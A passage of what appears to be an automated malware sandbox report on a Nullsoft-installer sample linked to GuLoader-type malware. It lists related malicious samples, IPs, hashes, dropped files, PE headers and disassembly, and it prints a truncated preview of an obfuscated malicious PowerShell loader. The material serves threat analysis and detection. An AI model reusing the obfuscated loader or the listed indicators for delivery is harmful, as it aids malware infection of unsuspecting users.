	nklx86.elf	Get hash	malicious	Unknown	Browse	213.149.254.180
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	89.17.213.27
	Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe	Get hash	malicious	FormBook	Browse	217.116.0.191
	Scanned Docs from Emnes Metal Sdn Bhd_.exe	Get hash	malicious	FormBook	Browse	217.116.0.191

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.184.238 142.250.181.225
	TVPfW4WUdj.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.181.225
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.181.225
	WtZl31OLfA.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.184.238 142.250.181.225
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.184.238 142.250.181.225
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.181.225
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.184.238 142.250.181.225
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.238 142.250.181.225
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.184.238 142.250.181.225
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.184.238 142.250.181.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll	WtZl31OLfA.exe	Get hash	malicious	Remcos, GuLoader	Browse
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	TeamViewer_Setup.exe	Get hash	malicious	Unknown	Browse
	DHL TAX INVOICES - MARCH 2024.exe	Get hash	malicious	Remcos, GuLoader	Browse
	REF_17218_VV-0002.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO_00290292.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	teamviewer_Px-yDq1.exe	Get hash	malicious	Unknown	Browse
	teamviewer_Px-yDq1.exe	Get hash	malicious	Unknown	Browse
	SMGS-RCDU5010031.exe	Get hash	malicious	GuLoader, Remcos	Browse
	SMGS-RCDU5010031.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3su10i3.wei.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwkjnwoi.5gz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pr1k2cjl.wkj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v12alojy.s0h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.140229856656103
Encrypted:	false
SSDEEP:	96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
MD5:	01E76FE9D2033606A48D4816BD9C2D9D
SHA1:	E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
SHA-256:	EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
SHA-512:	62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: WtZl31OLfA.exe, Detection: malicious, Browse Filename: 4Vx2rUlb0f.exe, Detection: malicious, Browse Filename: TeamViewer_Setup.exe, Detection: malicious, Browse Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse Filename: PO_00290292.exe, Detection: malicious, Browse Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\neoimpressionism\Cordts.for

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	data
Category:	dropped
Size (bytes):	362270
Entropy (8bit):	1.2455855418607977
Encrypted:	false
SSDEEP:	1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
MD5:	9FA2163989C46356E859FEA0B8963C98
SHA1:	7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
SHA-256:	3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
SHA-512:	39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
Malicious:	false
Preview:	.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................

C:\Users\user\AppData\Local\neoimpressionism\Isoserine.neg

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	data
Category:	dropped
Size (bytes):	261410
Entropy (8bit):	1.2549428792982014
Encrypted:	false
SSDEEP:	768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
MD5:	37AEF816B4DE967A79095F52FE324B50
SHA1:	5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
SHA-256:	3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
SHA-512:	D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
Malicious:	false
Preview:	..........................c..........................................................................................................L......................................0......................)....................1D......................R....\|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................

C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	783354
Entropy (8bit):	7.774177303886318
Encrypted:	false
SSDEEP:	12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
MD5:	EE18481E218CC9BC7A1628F5A7365776
SHA1:	57EA302C84A488DE1E5A5BCC669E02C5D9A7A350
SHA-256:	F19B72B88DDBF56B257E6EEF19C74E304BEAF8F95D352741E400993472E721C9
SHA-512:	A4AE4E6F3D46C05141E1D60B3F92D1B2AD27D758AE27BC063FB3F5FEF953237120480E700C5D05D90CC41D92497674C0E7D3E25DBD62E591445170077309F78B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\neoimpressionism\Starost.Aud169

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	data
Category:	dropped
Size (bytes):	341258
Entropy (8bit):	7.5908351004492856
Encrypted:	false
SSDEEP:	6144:JEBKpWL+9zQgh3aN1OQXMDxRIEVzK58aDIr4h8:JEBKpWK9zBh41OuGPI/u2M4h8
MD5:	A01A7B6997298405D8DB82D7019581B1
SHA1:	DB88DB262A5A9B901E79F164528DFCE4DEC096E1
SHA-256:	B65ED13D031C96566DC34332BD1BC3AE757911BAE5E348D9A8819905289F7620
SHA-512:	5CEAF1BBE6A7BB3BA41568328A27803FE028F0D347345059A05EE2A980C84BABF17734B4B9529EC6F847308A4C9EE5AA90E69194504D74273E8CEE7507A787F3
Malicious:	false
Preview:	........y..................DD.TT...<.................................q.......qqq./.ll.;...]..V.......................L.....@.........W.9999.hhhhhh.......7.......a....................&..........I...........=.........z.......t.................0000....................yy.................v.....?.............\........nnn...............___..............TTTTTTTTTTT.rr.(..........c...........................m....................................."......>.P.gggg.....................ZZZZ.....:..........l...FFF.............t..................rr.......K.....X..........<....c..........11....}......??.........&&..............SSSS.W.....h.....99....................M.1.......D...r..........c.7.......RR..LLLLLLLL...........................v.....yyy...S........'............................}.w....(...~..TT......PPPPPPPP..............VVV...............~......................=............```.......++.................................z............2.ee....j........ll.v......../.........................<....

C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4183), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	70162
Entropy (8bit):	5.182472338613328
Encrypted:	false
SSDEEP:	768:izMpl7Jm9+tcfqGwXX1bP7fCcwk2ozhJpvITk7Sdr74CRFCCOYon+RbxW1hNXgrG:bxcyb9+wtJpvITj7RTGh1grXV4Los
MD5:	0751B57E7C9836548F433D8A91BBC582
SHA1:	5F12A72DA78DA084E25B751B11A5E556CC88F6D5
SHA-256:	7307EB64E3419383D4EC7BD555F85EE9CA56E0972D75FD74A8949F4E412448F7
SHA-512:	2EE12BD05F884332A51587A3664488356C3149EA1971D9FD9BF474EF01EE2D78C01CD981130EB2BCD152EB3A685F4C6C385C4D4835E100510CD93AD6F43993A6
Malicious:	true
Preview:	$Pulveriserede=$Trichitis166ndblsende194;........$Tzontle = @'.Epongek.agammag$IllustrPunbuyaboWreckaglAme ropidoblingtDia hthu Moc asr UltraheHypersprOmphalosSkrmbl =Korre.t$Eks.erimAfmystioThriceccBarsjeakKlubmd eDykker.rKriminoyKnickkn;None pi.KartonefSabbatsuFald,ydn Int mecRec.llet SupersiKarakteoMavefornTilsy.s DishonoCUtilitaaZerkpenpRumpa,ei Csarist.eudeckuDecarnalNonexteaTygningrOppiske6Uncriti Bet lin(,ncrema$UdstrknW GympieyElicitestrafi moSonnetin arbuil,Brac ym$ Bilg,wPSow rshrBanebryeOrds rrcS ngefoeRhetorir Coiffue Telegrmunresplo HetzednTraditiiS.ferhieFa hions Punkts)Sgersdu Pr teac{almvina.Rissian. Daises$Fork rtC NovemboAnmrk iiStrstevnArtocarvInacceno esteplCalpollv AlvorseHelikop Jeree.t(KlkkeliNPengebeaCyklingtDeposituFlonelsrSpeci laekstenslBekymrikMini atoFll.sannComputeoPolyc rm unsymbiNonplatsPrivate Po,lin' L stelMResurgeeTerrorgs ScutchhHeltesaiastrerreSprsamarUnderle$EnlistmHVideresu PaaklinBogudlatProgramsSee,stomSelverkaFortolkWOmsti lFCircularTra.esc,

C:\Users\user\AppData\Local\neoimpressionism\harpedes.ham

Download File

Process:	C:\Users\user\Desktop\Kb94RzMYNf.exe
File Type:	data
Category:	dropped
Size (bytes):	452801
Entropy (8bit):	1.253535297499313
Encrypted:	false
SSDEEP:	1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
MD5:	36666AD5AFAD8972D1AC9D4BB141614D
SHA1:	2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
SHA-256:	03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
SHA-512:	51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
Malicious:	false
Preview:	.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.774177303886318
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Kb94RzMYNf.exe
File size:	783'354 bytes
MD5:	ee18481e218cc9bc7a1628f5a7365776
SHA1:	57ea302c84a488de1e5a5bcc669e02c5d9a7a350
SHA256:	f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
SHA512:	a4ae4e6f3d46c05141e1d60b3f92d1b2ad27d758ae27bc063fb3f5fef953237120480e700c5d05d90cc41d92497674c0e7d3e25dbd62e591445170077309f78b
SSDEEP:	12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
TLSH:	7CF4E0B2DF397522ED489872E42B1DF797744872CA64E8123152BC37F5209A6EF0920F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@

File Icon


Icon Hash:	b2b3aeb696aefe9e

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e2a592076b17ef8bfb48b7e03965a3fc

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F0F493A50A3h
push ebx
call 00007F0F493A81E4h
cmp eax, ebx
je 00007F0F493A5099h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007F0F493A815Eh
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F0F493A507Ch
push ebp
push 00000009h
call 00007F0F493A81B6h
push 00000007h
call 00007F0F493A81AFh
mov dword ptr [00434EE4h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [00434F98h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h
push 00433EE0h
call 00007F0F493A7D98h
call dword ptr [004080A8h]
mov ebp, 0043F000h
push eax
push ebp
call 00007F0F493A7D86h
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2f8e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637b	0x6400	967d0e18ece4b8dcc63ec9d544660136	False	0.671484375	data	6.484796945043301	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14b0	0x1600	d6b0bc2db2de2a3dd996fda6539cef0e	False	0.4401633522727273	data	5.033673390997287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2afd8	0x600	2aa587c909999ca52be17d0f1ffbd186	False	0.5188802083333334	data	4.039551377217298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2f8e8	0x2fa00	0d35228bed9e6f3e44cf465cb8cafb1c	False	0.35265440452755903	data	6.469094045775567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x53388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.19277179699514965
RT_ICON	0x63bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.21263401303342444
RT_ICON	0x6d058	0x74dc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9871306324374917
RT_ICON	0x74538	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.2557301293900185
RT_ICON	0x799c0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.2701936702881436
RT_ICON	0x7dbe8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.333298755186722
RT_ICON	0x80190	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.44183864915572235
RT_ICON	0x81238	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.5352459016393443
RT_ICON	0x81bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.6604609929078015
RT_DIALOG	0x82028	0x100	data	English	United States	0.5234375
RT_DIALOG	0x82128	0xf8	data	English	United States	0.6370967741935484
RT_DIALOG	0x82220	0xa0	data	English	United States	0.6125
RT_DIALOG	0x822c0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x82320	0x84	data	English	United States	0.946969696969697
RT_VERSION	0x823a8	0x1fc	data	English	United States	0.5413385826771654
RT_MANIFEST	0x825a8	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, 